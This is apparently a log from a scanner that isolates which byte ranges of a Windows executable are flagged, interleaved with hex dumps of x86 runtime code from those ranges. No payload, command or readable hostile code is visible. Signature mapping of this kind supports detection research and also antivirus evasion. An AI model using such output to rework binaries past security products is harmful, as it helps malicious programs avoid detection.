00005FD0   F7 F6 3B 45 0C 72 34 0F AF 75 0C 85 F6 75 17 46    ..;E.r4..u...u.F
00005FE0   EB 14 E8 2D F0 FF FF 85 C0 74 20 56 E8 12 43 00    ...-.....t V..C.
00005FF0   00 59 85 C0 74 15 56 6A 08 FF 35 B0 B3 41 00 FF    .Y..t.Vj..5..A..
00006000   15 9C 20 41 00 85 C0 74 D9 EB 0D E8 9B FF FF FF    .. A...t........
00006010   C7 00 0C 00 00 00 33 C0 5E 5D C3 8B FF 55 8B EC    ......3.^]...U..
00006020   83 7D 08 00 74 2D FF 75 08 6A 00 FF 35 B0 B3 41    .}..t-.u.j..5..A
00006030   00 FF 15 A0 20 41 00 85 C0 75 18 56 E8 6A FF FF    .... A...u.V.j..
00006040   FF 8B F0 FF 15 48 20 41 00 50 E8 E3 FE FF FF 59    .....H A.P.....Y
00006050   89 06 5E 5D C3 68 80 37 41 00 68 78 37 41 00 68    ..^].h.7A.hx7A.h
00006060   80 37 41 00 6A 01 E8 FF 00 00 00 83 C4 10 C3 68    .7A.j..........h
[INFO    ][2023-07-21 13:35:03,997] _scanDataPart() :: Result: 24688-24960 (272 bytes)
00006070   C0 37 41 00 68 B8 37 41 00 68 C0 37 41 00 6A 14    .7A.h.7A.h.7A.j.
00006080   E8 E5 00 00 00 83 C4 10 C3 68 D8 37 41 00 68 D0    .........h.7A.h.
00006090   37 41 00 68 D8 37 41 00 6A 16 E8 CB 00 00 00 83    7A.h.7A.j.......
000060A0   C4 10 C3 8B FF 55 8B EC 51 53 56 57 8B 7D 08 E9    .....U..QSVW.}..
000060B0   A2 00 00 00 8B 1F 8D 04 9D 48 AF 41 00 8B 30 89    .........H.A..0.
000060C0   45 FC 90 85 F6 74 0B 83 FE FF 0F 84 83 00 00 00    E....t..........
000060D0   EB 7D 8B 1C 9D 00 33 41 00 68 00 08 00 00 6A 00    .}....3A.h....j.
000060E0   53 FF 15 78 20 41 00 8B F0 85 F6 75 50 FF 15 48    S..x A.....uP..H
000060F0   20 41 00 83 F8 57 75 35 6A 07 68 B8 2B 41 00 53     A...Wu5j.h.+A.S
00006100   E8 03 FC FF FF 83 C4 0C 85 C0 74 21 6A 07 68 68    ..........t!j.hh
00006110   37 41 00 53 E8 EF FB FF FF 83 C4 0C 85 C0 74 0D    7A.S..........t.
00006120   56 56 53 FF 15 78 20 41 00 8B F0 EB 02 33 F6 85    VVS..x A.....3..
00006130   F6 75 0A 8B 4D FC 83 C8 FF 87 01 EB 16 8B 4D FC    .u..M.........M.
00006140   8B C6 87 01 85 C0 74 07 56 FF 15 70 20 41 00 85    ......t.V..p A..
00006150   F6 75 13 83 C7 04 3B 7D 0C 0F 85 55 FF FF FF 33    .u....;}...U...3
00006160   C0 5F 5E 5B C9 C3 8B C6 EB F7 8B FF 55 8B EC 8B    ._^[........U...
00006170   45 08 53 57 8D 1C 85 98 AF 41 00 8B 03 90 8B 15    E.SW.....A......
[INFO    ][2023-07-21 13:35:03,999] _scanDataPart() :: Result: 24960-25232 (272 bytes)
00006180   04 A0 41 00 83 CF FF 8B CA 33 D0 83 E1 1F D3 CA    ..A......3......
00006190   3B D7 75 04 33 C0 EB 51 85 D2 74 04 8B C2 EB 49    ;.u.3..Q..t....I
000061A0   56 FF 75 14 FF 75 10 E8 F7 FE FF FF 59 59 85 C0    V.u..u......YY..
000061B0   74 1D FF 75 0C 50 FF 15 74 20 41 00 8B F0 85 F6    t..u.P..t A.....
000061C0   74 0D 56 E8 32 E3 FF FF 59 87 03 8B C6 EB 19 A1    t.V.2...Y.......
000061D0   04 A0 41 00 6A 20 83 E0 1F 59 2B C8 D3 CF 33 3D    ..A.j ...Y+...3=
000061E0   04 A0 41 00 87 3B 33 C0 5E 5F 5B 5D C3 8B FF 55    ..A..;3.^_[]...U
000061F0   8B EC 56 68 F0 37 41 00 68 EC 37 41 00 68 F0 37    ..Vh.7A.h.7A.h.7
00006200   41 00 6A 1C E8 61 FF FF FF 8B F0 83 C4 10 85 F6    A.j..a..........
00006210   74 11 FF 75 08 8B CE 6A FA FF 15 20 21 41 00 FF    t..u...j... !A..
00006220   D6 EB 05 B8 25 02 00 C0 5E 5D C2 04 00 8B FF 55    ....%...^].....U
00006230   8B EC 56 E8 1D FE FF FF 8B F0 85 F6 74 27 FF 75    ..V.........t'.u
00006240   28 8B CE FF 75 24 FF 75 20 FF 75 1C FF 75 18 FF    (...u$.u .u..u..
00006250   75 14 FF 75 10 FF 75 0C FF 75 08 FF 15 20 21 41    u..u..u..u... !A
00006260   00 FF D6 EB 20 FF 75 1C FF 75 18 FF 75 14 FF 75    .... .u..u..u..u
00006270   10 FF 75 0C 6A 00 FF 75 08 E8 B3 01 00 00 50 FF    ..u.j..u......P.
00006280   15 A4 20 41 00 5E 5D C2 24 00 8B FF 55 8B EC 56    .. A.^].$...U..V
[INFO    ][2023-07-21 13:35:04,000] _scanDataPart() :: Result: 25232-25504 (272 bytes)
00006290   68 98 37 41 00 68 90 37 41 00 68 D0 2B 41 00 6A    h.7A.h.7A.h.+A.j
000062A0   03 E8 C4 FE FF FF 8B F0 83 C4 10 85 F6 74 0F FF    .............t..
000062B0   75 08 8B CE FF 15 20 21 41 00 FF D6 EB 06 FF 15    u..... !A.......
000062C0   60 20 41 00 5E 5D C2 04 00 8B FF 55 8B EC 56 68    ` A.^].....U..Vh
000062D0   A0 37 41 00 68 98 37 41 00 68 E4 2B 41 00 6A 04    .7A.h.7A.h.+A.j.
000062E0   E8 85 FE FF FF 8B F0 83 C4 10 85 F6 74 12 FF 75    ............t..u
000062F0   08 8B CE FF 15 20 21 41 00 FF D6 5E 5D C2 04 00    ..... !A...^]...
00006300   5E 5D FF 25 6C 20 41 00 8B FF 55 8B EC 56 68 A8    ^].%l A...U..Vh.
00006310   37 41 00 68 A0 37 41 00 68 F4 2B 41 00 6A 05 E8    7A.h.7A.h.+A.j..
00006320   46 FE FF FF 8B F0 83 C4 10 85 F6 74 12 FF 75 08    F..........t..u.
00006330   8B CE FF 15 20 21 41 00 FF D6 5E 5D C2 04 00 5E    .... !A...^]...^
00006340   5D FF 25 64 20 41 00 8B FF 55 8B EC 56 68 B0 37    ].%d A...U..Vh.7
00006350   41 00 68 A8 37 41 00 68 08 2C 41 00 6A 06 E8 07    A.h.7A.h.,A.j...
00006360   FE FF FF 8B F0 83 C4 10 85 F6 74 15 FF 75 0C 8B    ..........t..u..
00006370   CE FF 75 08 FF 15 20 21 41 00 FF D6 5E 5D C2 08    ..u... !A...^]..
00006380   00 5E 5D FF 25 68 20 41 00 8B FF 55 8B EC 56 68    .^].%h A...U..Vh
00006390   B8 37 41 00 68 B0 37 41 00 68 1C 2C 41 00 6A 12    .7A.h.7A.h.,A.j.
[INFO    ][2023-07-21 13:35:04,001] _scanDataPart() :: Result: 25504-25776 (272 bytes)
000063A0   E8 C5 FD FF FF 8B F0 83 C4 10 85 F6 74 15 FF 75    ............t..u
000063B0   10 8B CE FF 75 0C FF 75 08 FF 15 20 21 41 00 FF    ....u..u... !A..
000063C0   D6 EB 0C FF 75 0C FF 75 08 FF 15 5C 20 41 00 5E    ....u..u...\ A.^
000063D0   5D C2 0C 00 8B FF 55 8B EC 56 E8 90 FC FF FF 8B    ].....U..V......
000063E0   F0 85 F6 74 27 FF 75 28 8B CE FF 75 24 FF 75 20    ...t'.u(...u$.u 
000063F0   FF 75 1C FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF    .u..u..u..u..u..
00006400   75 08 FF 15 20 21 41 00 FF D6 EB 20 FF 75 1C FF    u... !A.... .u..
00006410   75 18 FF 75 14 FF 75 10 FF 75 0C 6A 00 FF 75 08    u..u..u..u.j..u.
00006420   E8 0C 00 00 00 50 FF 15 A8 20 41 00 5E 5D C2 24    .....P... A.^].$
00006430   00 8B FF 55 8B EC 56 E8 4D FC FF FF 8B F0 85 F6    ...U..V.M.......
00006440   74 12 FF 75 0C 8B CE FF 75 08 FF 15 20 21 41 00    t..u....u... !A.
00006450   FF D6 EB 09 FF 75 08 E8 13 48 00 00 59 5E 5D C2    .....u...H..Y^].
00006460   08 00 B9 20 B0 41 00 B8 98 AF 41 00 33 D2 3B C8    ... .A....A.3.;.
00006470   56 8B 35 04 A0 41 00 1B C9 83 E1 DE 83 C1 22 42    V.5..A........"B
00006480   89 30 8D 40 04 3B D1 75 F6 B0 01 5E C3 8B FF 55    .0.@.;.u...^...U
00006490   8B EC 80 7D 08 00 75 27 56 BE 48 AF 41 00 83 3E    ...}..u'V.H.A..>
000064A0   00 74 10 83 3E FF 74 08 FF 36 FF 15 70 20 41 00    .t..>.t..6..p A.
[INFO    ][2023-07-21 13:35:04,839] _printStatus() :: Reducing: 424 chunks done, found 46 matches (155 added)
[INFO    ][2023-07-21 13:35:04,839] _scanDataPart() :: Result: 26592-26728 (136b minChunk:128 X)
000067E0   00 00 50 E8 50 46 00 00 59 59 85 C0 75 04 33 C0    ..P.PF..YY..u.3.
000067F0   EB 03 83 C8 FF 5E 5D C3 6A 01 E8 A7 FE FF FF 59    .....^].j......Y
00006800   C3 8B FF 55 8B EC 56 8B 75 08 57 8D 7E 0C 8B 07    ...U..V.u.W.~...
00006810   90 C1 E8 0D A8 01 74 25 8B 07 90 C1 E8 06 A8 01    ......t%........
00006820   74 1B FF 76 04 E8 F1 F7 FF FF 59 B8 BF FE FF FF    t..v......Y.....
00006830   F0 21 07 33 C0 89 46 04 89 06 89 46 08 5F 5E 5D    .!.3..F....F._^]
00006840   C3 8B FF 55 8B EC 83 EC 48 8D 45 B8 50 FF 15 38    ...U....H.E.P..8
00006850   20 41 00 66 83 7D EA 00 0F 84 97 00 00 00 53 8B     A.f.}........S.
00006860   5D EC 85 DB 0F 84 8A 00                            ].......
[INFO    ][2023-07-21 13:35:05,526] _scanDataPart() :: Result: 26864-27136 (272 bytes)
000068F0   75 AA 5F 5E 5B C9 C3 8B FF 53 56 57 33 FF 8B C7    u._^[....SVW3...
00006900   8B CF 83 E0 3F C1 F9 06 6B F0 38 03 34 8D 20 B0    ....?...k.8.4. .
00006910   41 00 83 7E 18 FF 74 0C 83 7E 18 FE 74 06 80 4E    A..~..t..~..t..N
00006920   28 80 EB 79 8B C7 C6 46 28 81 83 E8 00 74 10 83    (..y...F(....t..
00006930   E8 01 74 07 83 E8 01 6A F4 EB 06 6A F5 EB 02 6A    ..t....j...j...j
00006940   F6 58 50 FF 15 80 20 41 00 8B D8 83 FB FF 74 0D    .XP... A......t.
00006950   85 DB 74 09 53 FF 15 AC 20 41 00 EB 02 33 C0 85    ..t.S... A...3..
00006960   C0 74 1C 0F B6 C0 89 5E 18 83 F8 02 75 06 80 4E    .t.....^....u..N
00006970   28 40 EB 29 83 F8 03 75 24 80 4E 28 08 EB 1E 80    (@.)...u$.N(....
00006980   4E 28 40 C7 46 18 FE FF FF FF A1 CC AC 41 00 85    N(@.F........A..
00006990   C0 74 0A 8B 04 B8 C7 40 10 FE FF FF FF 47 83 FF    .t.....@.....G..
000069A0   03 0F 85 57 FF FF FF 5F 5E 5B C3 6A 0C 68 A8 90    ...W..._^[.j.h..
000069B0   41 00 E8 39 AA FF FF 6A 07 E8 2E 2D 00 00 59 33    A..9...j...-..Y3
000069C0   DB 88 5D E7 89 5D FC 53 E8 5F 2E 00 00 59 85 C0    ..]..].S._...Y..
000069D0   75 0F E8 6A FE FF FF E8 1B FF FF FF B3 01 88 5D    u..j...........]
000069E0   E7 C7 45 FC FE FF FF FF E8 15 00 00 00 8A C3 8B    ..E.............
000069F0   4D F0 64 89 0D 00 00 00 00 59 5F 5E 5B C9 C3 8A    M.d......Y_^[...
[INFO    ][2023-07-21 13:35:05,528] _scanDataPart() :: Result: 27136-27272 (136b minChunk:128 X)
00006A00   5D E7 6A 07 E8 2B 2D 00 00 59 C3 8B FF 56 33 F6    ].j..+-..Y...V3.
00006A10   8B 86 20 B0 41 00 85 C0 74 0E 50 E8 D7 2D 00 00    .. .A...t.P..-..
00006A20   83 A6 20 B0 41 00 00 59 83 C6 04 81 FE 00 02 00    .. .A..Y........
00006A30   00 72 DD B0 01 5E C3 8B FF 55 8B EC 56 8B 75 08    .r...^...U..V.u.
00006A40   83 FE E0 77 30 85 F6 75 17 46 EB 14 E8 C3 E5 FF    ...w0..u.F......
00006A50   FF 85 C0 74 20 56 E8 A8 38 00 00 59 85 C0 74 15    ...t V..8..Y..t.
00006A60   56 6A 00 FF 35 B0 B3 41 00 FF 15 9C 20 41 00 85    Vj..5..A.... A..
00006A70   C0 74 D9 EB 0D E8 31 F5 FF FF C7 00 0C 00 00 00    .t....1.........
00006A80   33 C0 5E 5D C3 8B FF 55                            3.^]...U
[INFO    ][2023-07-21 13:35:06,238] _scanDataPart() :: Result: 27680-27952 (272 bytes)
00006C20   FF 83 C4 10 5D C3 8B FF 55 8B EC 83 EC 18 57 8B    ....]...U.....W.
00006C30   7D 0C 85 FF 75 15 39 7D 10 76 10 8B 45 08 85 C0    }...u.9}.v..E...
00006C40   74 02 21 38 33 C0 E9 BA 00 00 00 53 8B 5D 08 85    t.!83......S.]..
00006C50   DB 74 03 83 0B FF 81 7D 10 FF FF FF 7F 56 76 14    .t.....}.....Vv.
00006C60   E8 46 F3 FF FF 6A 16 5E 89 30 E8 7F F2 FF FF E9    .F...j.^.0......
00006C70   8D 00 00 00 FF 75 18 8D 4D E8 E8 A7 BF FF FF 8B    .....u..M.......
00006C80   45 EC 33 F6 8B 48 08 81 F9 E9 FD 00 00 75 2C 8D    E.3..H.......u,.
00006C90   45 F8 89 75 F8 50 0F B7 45 14 50 57 89 75 FC E8    E..u.P..E.PW.u..
00006CA0   FB 4D 00 00 83 C4 0C 85 DB 74 02 89 03 83 F8 04    .M.......t......
00006CB0   7E 3F E8 F4 F2 FF FF 8B 30 EB 36 39 B0 A8 00 00    ~?......0.69....
00006CC0   00 75 5C 66 8B 45 14 B9 FF 00 00 00 66 3B C1 76    .u\f.E......f;.v
00006CD0   37 85 FF 74 12 39 75 10 76 0D FF 75 10 56 57 E8    7..t.9u.v..u.VW.
00006CE0   2C AC FF FF 83 C4 0C E8 BF F2 FF FF 6A 2A 5E 89    ,...........j*^.
00006CF0   30 80 7D F4 00 74 0A 8B 4D E8 83 A1 50 03 00 00    0.}..t..M...P...
00006D00   FD 8B C6 5E 5B 5F C9 C3 85 FF 74 07 39 75 10 76    ...^[_....t.9u.v
00006D10   5C 88 07 85 DB 74 DA C7 03 01 00 00 00 EB D2 8D    \....t..........
00006D20   45 FC 89 75 FC 50 56 FF 75 10 8D 45 14 57 6A 01    E..u.PV.u..E.Wj.
[INFO    ][2023-07-21 13:35:07,134] _printStatus() :: Reducing: 436 chunks done, found 49 matches (159 added)
[INFO    ][2023-07-21 13:35:07,135] _scanDataPart() :: Result: 27952-28088 (136b minChunk:128 X)
00006D30   50 56 51 E8 A7 24 00 00 83 C4 20 85 C0 74 0D 39    PVQ..$.... ..t.9
00006D40   75 FC 75 A3 85 DB 74 A9 89 03 EB A5 FF 15 48 20    u.u...t.......H 
00006D50   41 00 83 F8 7A 75 90 85 FF 74 12 39 75 10 76 0D    A...zu...t.9u.v.
00006D60   FF 75 10 56 57 E8 A6 AB FF FF 83 C4 0C E8 39 F2    .u.VW.........9.
00006D70   FF FF 6A 22 5E 89 30 E8 72 F1 FF FF E9 70 FF FF    ..j"^.0.r....p..
00006D80   FF 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75    ...U..j..u..u..u
00006D90   0C FF 75 08 E8 8D FE FF FF 83 C4 14 5D C3 8B FF    ..u.........]...
00006DA0   55 8B EC A1 18 AC 41 00 56 57 83 F8 05 0F 8C B7    U.....A.VW......
00006DB0   00 00 00 8B 4D 08 F6 C1                            ....M...
[INFO    ][2023-07-21 13:35:08,239] _scanDataPart() :: Result: 28360-28496 (136b minChunk:128 X)
00006EC8   0C 66 39 01 74 07 83 C1 02 3B CF 75 F4 2B CE D1    .f9.t....;.u.+..
00006ED8   F9 3B CA 75 6B 8B 45 0C 8D 3C 4E 2B C2 0F 57 C9    .;.uk.E..<N+..W.
00006EE8   83 E0 F0 03 C1 8D 0C 46 EB 12 0F 10 07 66 0F 75    .......F.....f.u
00006EF8   C1 66 0F D7 C0 85 C0 75 07 83 C7 10 3B F9 75 EA    .f.....u....;.u.
00006F08   8B 45 0C 8D 0C 46 3B F9 74 0E 33 C0 66 39 07 74    .E...F;.t.3.f9.t
00006F18   07 83 C7 02 3B F9 75 F4 8B CF E9 AE FE FF FF 8B    ....;.u.........
00006F28   55 08 8B CA 8B 45 0C 8D 34 42 3B D6 74 0E 33 C0    U....E..4B;.t.3.
00006F38   66 39 01 74 07 83 C1 02 3B CE 75 F4 2B CA D1 F9    f9.t....;.u.+...
00006F48   5F 8B C1 5E 5D C3 6A 08                            _..^].j.
[INFO    ][2023-07-21 13:35:09,076] _scanDataPart() :: Result: 28496-28632 (136b minChunk:128 X)
00006F50   68 C8 90 41 00 E8 96 A4 FF FF 8B 45 08 FF 30 E8    h..A.......E..0.
00006F60   88 27 00 00 59 83 65 FC 00 8B 45 0C 8B 00 8B 00    .'..Y.e...E.....
00006F70   8B 40 48 F0 FF 00 C7 45 FC FE FF FF FF E8 12 00    .@H....E........
00006F80   00 00 8B 4D F0 64 89 0D 00 00 00 00 59 5F 5E 5B    ...M.d......Y_^[
00006F90   C9 C2 0C 00 8B 45 10 FF 30 E8 96 27 00 00 59 C3    .....E..0..'..Y.
00006FA0   6A 08 68 08 91 41 00 E8 44 A4 FF FF 8B 45 08 FF    j.h..A..D....E..
00006FB0   30 E8 36 27 00 00 59 83 65 FC 00 8B 45 0C 8B 00    0.6'..Y.e...E...
00006FC0   8B 00 8B 48 48 85 C9 74 18 83 C8 FF F0 0F C1 01    ...HH..t........
00006FD0   75 0F 81 F9 00 A2 41 00                            u.....A.
[INFO    ][2023-07-21 13:35:09,753] _scanDataPart() :: Result: 28768-29040 (272 bytes)
00007060   6A 08 68 E8 90 41 00 E8 84 A3 FF FF 8B 45 08 FF    j.h..A.......E..
00007070   30 E8 76 26 00 00 59 83 65 FC 00 8B 4D 0C 8B 41    0.v&..Y.e...M..A
00007080   04 8B 00 FF 30 8B 01 FF 30 E8 B3 01 00 00 59 59    ....0...0.....YY
00007090   C7 45 FC FE FF FF FF E8 12 00 00 00 8B 4D F0 64    .E...........M.d
000070A0   89 0D 00 00 00 00 59 5F 5E 5B C9 C2 0C 00 8B 45    ......Y_^[.....E
000070B0   10 FF 30 E8 7C 26 00 00 59 C3 8B FF 55 8B EC 83    ..0.|&..Y...U...
000070C0   EC 14 8B 45 08 33 C9 41 6A 43 89 48 18 8B 45 08    ...E.3.AjC.H..E.
000070D0   C7 00 50 30 41 00 8B 45 08 89 88 50 03 00 00 8B    ..P0A..E...P....
000070E0   45 08 59 6A 05 C7 40 48 00 A2 41 00 8B 45 08 66    E.Yj..@H..A..E.f
000070F0   89 48 6C 8B 45 08 66 89 88 72 01 00 00 8D 4D FF    .Hl.E.f..r....M.
00007100   8B 45 08 83 A0 4C 03 00 00 00 8D 45 08 89 45 F0    .E...L.....E..E.
00007110   58 89 45 F8 89 45 EC 8D 45 F8 50 8D 45 F0 50 8D    X.E..E..E.P.E.P.
00007120   45 EC 50 E8 26 FE FF FF 8D 45 08 89 45 F4 8D 4D    E.P.&....E..E..M
00007130   FF 6A 04 8D 45 0C 89 45 F8 58 89 45 EC 89 45 F0    .j..E..E.X.E..E.
00007140   8D 45 EC 50 8D 45 F4 50 8D 45 F0 50 E8 0F FF FF    .E.P.E.P.E.P....
00007150   FF C9 C3 8B FF 55 8B EC 83 7D 08 00 74 12 FF 75    .....U...}..t..u
00007160   08 E8 0E 00 00 00 FF 75 08 E8 AD EE FF FF 59 59    .......u......YY
[INFO    ][2023-07-21 13:35:09,753] _printStatus() :: Reducing: 445 chunks done, found 51 matches (163 added)
[INFO    ][2023-07-21 13:35:10,594] _scanDataPart() :: Result: 29176-29312 (136b minChunk:128 X)
000071F8   24 8D 45 08 89 45 F4 8D 4D FF 6A 05 58 89 45 F8    $.E..E..M.j.X.E.
00007208   89 45 F0 8D 45 F8 50 8D 45 F4 50 8D 45 F0 50 E8    .E..E.P.E.P.E.P.
00007218   84 FD FF FF 6A 04 8D 45 08 89 45 F4 8D 4D FF 58    ....j..E..E..M.X
00007228   89 45 F0 89 45 F8 8D 45 F0 50 8D 45 F4 50 8D 45    .E..E..E.P.E.P.E
00007238   F8 50 E8 CC FD FF FF C9 C3 8B FF 55 8B EC 56 8B    .P.........U..V.
00007248   75 08 83 7E 4C 00 74 28 FF 76 4C E8 29 2E 00 00    u..~L.t(.vL.)...
00007258   8B 46 4C 59 3B 05 38 B2 41 00 74 14 3D 38 A1 41    .FLY;.8.A.t.=8.A
00007268   00 74 0D 83 78 0C 00 75 07 50 E8 3F 2C 00 00 59    .t..x..u.P.?,..Y
00007278   8B 45 0C 89 46 4C 5E 85                            .E..FL^.
[INFO    ][2023-07-21 13:35:11,261] _scanDataPart() :: Result: 29312-29584 (272 bytes)
00007280   C0 74 07 50 E8 B0 2B 00 00 59 5D C3 8B FF 53 56    .t.P..+..Y]...SV
00007290   57 FF 15 48 20 41 00 8B F0 A1 30 A1 41 00 83 F8    W..H A....0.A...
000072A0   FF 74 1C 50 E8 5F F0 FF FF 8B F8 85 FF 74 0B 83    .t.P._.......t..
000072B0   FF FF 75 78 33 DB 8B FB EB 74 A1 30 A1 41 00 6A    ..ux3....t.0.A.j
000072C0   FF 50 E8 80 F0 FF FF 85 C0 74 E9 68 64 03 00 00    .P.......t.hd...
000072D0   6A 01 E8 E7 EC FF FF 8B F8 59 59 85 FF 75 17 33    j........YY..u.3
000072E0   DB 53 FF 35 30 A1 41 00 E8 5A F0 FF FF 53 E8 28    .S.50.A..Z...S.(
000072F0   ED FF FF 59 EB C0 57 FF 35 30 A1 41 00 E8 45 F0    ...Y..W.50.A..E.
00007300   FF FF 85 C0 75 11 33 DB 53 FF 35 30 A1 41 00 E8    ....u.3.S.50.A..
00007310   33 F0 FF FF 57 EB D7 68 38 B2 41 00 57 E8 98 FD    3...W..h8.A.W...
00007320   FF FF 6A 00 E8 F2 EC FF FF 83 C4 0C 8B DF 56 FF    ..j...........V.
00007330   15 4C 20 41 00 F7 DF 1B FF 23 FB 74 06 8B C7 5F    .L A.....#.t..._
00007340   5E 5B C3 E8 92 E2 FF FF CC A1 30 A1 41 00 56 83    ^[........0.A.V.
00007350   F8 FF 74 18 50 E8 AE EF FF FF 8B F0 85 F6 74 07    ..t.P.........t.
00007360   83 FE FF 74 78 EB 6E A1 30 A1 41 00 6A FF 50 E8    ...tx.n.0.A.j.P.
00007370   D3 EF FF FF 85 C0 74 65 68 64 03 00 00 6A 01 E8    ......tehd...j..
00007380   3A EC FF FF 8B F0 59 59 85 F6 75 15 50 FF 35 30    :.....YY..u.P.50
[INFO    ][2023-07-21 13:35:11,951] _scanDataPart() :: Result: 29584-29856 (272 bytes)
00007390   A1 41 00 E8 AF EF FF FF 56 E8 7D EC FF FF 59 EB    .A......V.}...Y.
000073A0   3C 56 FF 35 30 A1 41 00 E8 9A EF FF FF 85 C0 75    <V.50.A........u
000073B0   0F 50 FF 35 30 A1 41 00 E8 8A EF FF FF 56 EB D9    .P.50.A......V..
000073C0   68 38 B2 41 00 56 E8 EF FC FF FF 6A 00 E8 49 EC    h8.A.V.....j..I.
000073D0   FF FF 83 C4 0C 85 F6 74 04 8B C6 5E C3 E8 F8 E1    .......t...^....
000073E0   FF FF CC 8B FF 53 56 57 FF 15 48 20 41 00 8B F0    .....SVW..H A...
000073F0   A1 30 A1 41 00 83 F8 FF 74 1C 50 E8 08 EF FF FF    .0.A....t.P.....
00007400   8B F8 85 FF 74 0B 83 FF FF 75 78 33 DB 8B FB EB    ....t....ux3....
00007410   74 A1 30 A1 41 00 6A FF 50 E8 29 EF FF FF 85 C0    t.0.A.j.P.).....
00007420   74 E9 68 64 03 00 00 6A 01 E8 90 EB FF FF 8B F8    t.hd...j........
00007430   59 59 85 FF 75 17 33 DB 53 FF 35 30 A1 41 00 E8    YY..u.3.S.50.A..
00007440   03 EF FF FF 53 E8 D1 EB FF FF 59 EB C0 57 FF 35    ....S.....Y..W.5
00007450   30 A1 41 00 E8 EE EE FF FF 85 C0 75 11 33 DB 53    0.A........u.3.S
00007460   FF 35 30 A1 41 00 E8 DC EE FF FF 57 EB D7 68 38    .50.A......W..h8
00007470   B2 41 00 57 E8 41 FC FF FF 6A 00 E8 9B EB FF FF    .A.W.A...j......
00007480   83 C4 0C 8B DF 56 FF 15 4C 20 41 00 F7 DF 1B FF    .....V..L A.....
00007490   23 FB 8B C7 5F 5E 5B C3 68 53 7D 40 00 E8 E8 ED    #..._^[.hS}@....
[INFO    ][2023-07-21 13:35:11,952] _printStatus() :: Reducing: 452 chunks done, found 52 matches (166 added)
[INFO    ][2023-07-21 13:35:11,952] _scanDataPart() :: Result: 29856-29992 (136b minChunk:128 X)
000074A0   FF FF A3 30 A1 41 00 83 F8 FF 75 03 32 C0 C3 E8    ...0.A....u.2...
000074B0   2F FF FF FF 85 C0 75 09 50 E8 06 00 00 00 59 EB    /.....u.P.....Y.
000074C0   EB B0 01 C3 A1 30 A1 41 00 83 F8 FF 74 0D 50 E8    .....0.A....t.P.
000074D0   F5 ED FF FF 83 0D 30 A1 41 00 FF B0 01 C3 8B FF    ......0.A.......
000074E0   55 8B EC 56 8B 75 0C 8B 06 3B 05 38 B2 41 00 74    U..V.u...;.8.A.t
000074F0   17 8B 4D 08 A1 80 A7 41 00 85 81 50 03 00 00 75    ..M....A...P...u
00007500   07 E8 FC 2B 00 00 89 06 5E 5D C3 8B FF 55 8B EC    ...+....^]...U..
00007510   56 8B 75 0C 8B 06 3B 05 44 B2 41 00 74 17 8B 4D    V.u...;.D.A.t..M
00007520   08 A1 80 A7 41 00 85 81                            ....A...
[INFO    ][2023-07-21 13:35:11,955] _scanDataPart() :: Result: 32848-33120 (272 bytes)
00008050   40 08 FE 79 11 FF 75 0C 0F B7 45 08 50 E8 18 5A    @..y..u...E.P..Z
00008060   00 00 59 59 5D C3 8B 55 0C 66 8B 45 08 8B 0A 66    ..YY]..U.f.E...f
00008070   89 01 83 02 02 5D C3 8B FF 55 8B EC 83 EC 10 A1    .....]...U......
00008080   04 A0 41 00 33 C5 89 45 FC 57 8B 7D 0C 8B 47 0C    ..A.3..E.W.}..G.
00008090   90 C1 E8 0C A8 01 74 10 57 FF 75 08 E8 A6 FF FF    ......t.W.u.....
000080A0   FF 59 59 E9 EB 00 00 00 53 56 57 E8 F0 00 00 00    .YY.....SVW.....
000080B0   BB F8 A0 41 00 59 83 F8 FF 74 30 57 E8 DF 00 00    ...A.Y...t0W....
000080C0   00 59 83 F8 FE 74 24 57 E8 D3 00 00 00 8B F0 57    .Y...t$W.......W
000080D0   C1 FE 06 E8 C8 00 00 00 59 83 E0 3F 59 6B C8 38    ........Y..?Yk.8
000080E0   8B 04 B5 20 B0 41 00 03 C1 EB 02 8B C3 8A 40 29    ... .A........@)
000080F0   3C 02 0F 84 8E 00 00 00 3C 01 0F 84 86 00 00 00    <.......<.......
00008100   57 E8 9A 00 00 00 59 83 F8 FF 74 2E 57 E8 8E 00    W.....Y...t.W...
00008110   00 00 59 83 F8 FE 74 22 57 E8 82 00 00 00 8B F0    ..Y...t"W.......
00008120   57 C1 FE 06 E8 77 00 00 00 8B 1C B5 20 B0 41 00    W....w...... .A.
00008130   83 E0 3F 59 59 6B C8 38 03 D9 80 7B 28 00 7D 46    ..?YYk.8...{(.}F
00008140   FF 75 08 8D 45 F4 6A 05 50 8D 45 F0 50 E8 2F EC    .u..E.j.P.E.P./.
00008150   FF FF 83 C4 10 85 C0 75 26 33 F6 39 75 F0 7E 19    .......u&3.9u.~.
[INFO    ][2023-07-21 13:35:12,675] _scanDataPart() :: Result: 33120-33392 (272 bytes)
00008160   0F BE 44 35 F4 57 50 E8 5B 00 00 00 59 59 83 F8    ..D5.WP.[...YY..
00008170   FF 74 0C 46 3B 75 F0 7C E7 66 8B 45 08 EB 12 B8    .t.F;u.|.f.E....
00008180   FF FF 00 00 EB 0B 57 FF 75 08 E8 B8 FE FF FF 59    ......W.u......Y
00008190   59 5E 5B 8B 4D FC 33 CD 5F E8 3B 89 FF FF C9 C3    Y^[.M.3._.;.....
000081A0   8B FF 55 8B EC 8B 45 08 85 C0 75 15 E8 FA DD FF    ..U...E...u.....
000081B0   FF C7 00 16 00 00 00 E8 32 DD FF FF 83 C8 FF 5D    ........2......]
000081C0   C3 8B 40 10 90 5D C3 8B FF 55 8B EC 8B 55 0C 83    ..@..]...U...U..
000081D0   6A 08 01 79 0D 52 FF 75 08 E8 91 58 00 00 59 59    j..y.R.u...X..YY
000081E0   5D C3 8B 02 8A 4D 08 88 08 FF 02 0F B6 C1 5D C3    ]....M........].
000081F0   8B 0D 04 A0 41 00 33 C0 83 C9 01 39 0D 2C B2 41    ....A.3....9.,.A
00008200   00 0F 94 C0 C3 8B FF 55 8B EC 6A 02 E8 F7 A3 FF    .......U..j.....
00008210   FF 59 39 45 08 74 25 6A 01 E8 EA A3 FF FF 59 39    .Y9E.t%j......Y9
00008220   45 08 75 14 FF 75 08 E8 74 FF FF FF 50 E8 53 58    E.u..u..t...P.SX
00008230   00 00 59 59 85 C0 75 04 32 C0 5D C3 B0 01 5D C3    ..YY..u.2.]...].
00008240   8B FF 55 8B EC 53 56 8B 75 08 57 56 E8 B4 FF FF    ..U..SV.u.WV....
00008250   FF 59 84 C0 0F 84 8B 00 00 00 6A 01 E8 A7 A3 FF    .Y........j.....
00008260   FF 59 6A 02 5B 3B F0 75 07 BF 30 B2 41 00 EB 10    .Yj.[;.u..0.A...
